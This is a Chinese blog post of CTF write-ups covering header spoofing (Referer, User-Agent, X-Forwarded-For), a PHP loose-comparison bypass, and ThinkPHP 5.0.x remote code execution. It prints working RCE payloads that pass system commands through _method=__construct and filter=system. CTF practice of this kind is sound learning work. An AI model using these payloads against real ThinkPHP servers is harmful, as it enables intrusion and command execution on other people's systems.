今天出去爬山了,回来已经是晚上了,做几题简单的练练手吧
[极客大挑战 2019]Http
这题也就很基础的,查看源码发现Secret.php,然后来一波修改Referer,修改User-Agent和Xff就可以了
这次新发现的问题就是,头文件里面XFF要放在Referer上面,不然会直接400 Bad Requst
[BJDCTF 2nd]old-hack
hhh这题直接把thinkphp写在首页上了,马上想到thinkphp5.0.x的rce漏洞,随便传入一个参数让他报错,发现是5.0.23,上网找个payload
(POST)_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={系统命令}
然后直接cat /flag
顺带发一下 5.0.8~5.0.19 的版本:
(GET)s=whoami&_method=__construct&filter&filter=system
更多参考资料: https://blog.csdn.net/qq_36304918/article/details/86384042
https://blog.csdn.net/weixin_40709439/article/details/86564457
[ACTF2020 新生赛]BackupFile
找到备份文件index.php.bak
<?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); }intval $key = intval($key); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"; if($key == $str) { echo $flag; } } else { echo "Try to find out source file!"; }
这题是字符串类型与int类型的弱比较漏洞,那一串$str如果与Int类型比较的话,只会匹配123,所以payload就是123
Comments | NOTHING